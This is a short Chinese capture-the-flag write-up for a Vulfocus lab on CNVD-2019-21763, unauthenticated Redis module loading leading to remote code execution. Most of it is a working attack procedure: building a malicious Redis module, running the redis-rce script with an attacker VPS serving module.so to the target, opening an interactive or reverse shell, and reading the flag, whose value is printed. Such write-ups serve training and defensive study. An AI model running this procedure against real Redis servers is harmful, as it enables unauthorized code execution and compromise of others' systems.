cnvd-2019-21763

名称:

vulfocus/redis-cnvd_2019_21763 靶场解题

描述:

Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。

由于在Reids 4.x及以上版本中新增了模块功能,攻击者可通过外部拓展,在Redis中实现一个新的Redis命令。攻击者可以利用该功能引入模块,在未授权访问的情况下使被攻击服务器加载恶意。so 文件,从而实现远程代码执行。

解题:flag

plaintext
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
1,vps
git clone https://github.com/n0b0dyCN/RedisModules-ExecuteCommand
cd RedisModules-ExecuteCommand/
make
2,vps 执行
git clone https://github.com/Ridter/redis-rce.git
cd redis-rce/
3,vps复制module.so到redis-rce
cp ../module.so ./
4,安装依赖环境
pip install -r requirements.txt
5,执行脚本
python3 redis-rce.py -r 靶场ip -p 靶场端口 -L vps -P vps端口 -f module.so
6,选择i
What do u want ? [i]nteractive shell or [r]everse shell or [e]xit: i
7,
$ ls /tmp
flag-{bmhdae06302-7b71-412a-a1ad-25eb0b38197e}